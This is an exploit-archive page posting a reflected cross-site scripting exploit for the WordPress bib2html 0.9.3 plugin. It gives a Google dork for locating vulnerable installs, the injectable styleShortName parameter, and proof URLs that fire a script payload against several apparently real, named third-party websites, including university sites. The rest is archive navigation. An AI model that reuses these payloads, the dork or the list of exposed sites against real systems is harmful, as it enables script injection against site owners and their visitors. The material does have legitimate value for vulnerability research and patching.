WordPress bib2html 0.9.3 Cross Site Scripting

WordPress bib2html 0.9.3 Cross Site Scripting: Posted May 22, 2014; Authored by Ashiyane Digital Security Team; WordPress bib2html plugin version 0.9.3 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.; tags | exploit, xss; SHA-256 | a4eadb29a9ee0fe5cc72b51220221339d9488e699962c0abddc7b56cc660e24f; Download | Favorite | View

WordPress bib2html 0.9.3 Cross Site Scripting

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress bib2html Cross site scripting Vulnerability
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-05-22
  |
  | [*] Vendor Homepage : http://www.wordpress.org
  |
  | [*] Software Link :  
http://downloads.wordpress.org/plugin/bib2html.0.9.3.zip
  |
  | [*] Google Dork: inurl:wp-content/plugins/bib2html
  |
  | [*] Tested on: Windows 7
  |
  | [*] Web browser : mozilla firefox
  |-------------------------------------------------------------------------|
  |
  | [*] Location :  
[localhost]/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=[XSS]
  |
  |-------------------------------------------------------------------------|
  | [*] Proof:
  |
  | [*]  
hhttp://www.adamwesterski.com/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
  |
  | [*]  
http://www.adamwesterski.com/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
  |
  | [*]  
http://doc.gold.ac.uk/mutators/wp/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
  |
  | [*]  
http://recursostic.javeriana.edu.co/narratopedia/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
  |
  | [*]  
http://blog.aleph0.info/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
  |-------------------------------------------------------------------------|
  | [*] Discovered By : ACC3SS
  |-------------------------------------------------------------------------|
  |-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

Top Authors In Last 30 Days

Red Hat 275 files
indoushka 177 files
Jay Turla 150 files
Ubuntu 77 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,327)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,893)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,867)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

WordPress bib2html 0.9.3 Cross Site Scripting

WordPress bib2html 0.9.3 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress bib2html 0.9.3 Cross Site Scripting

Share This

WordPress bib2html 0.9.3 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems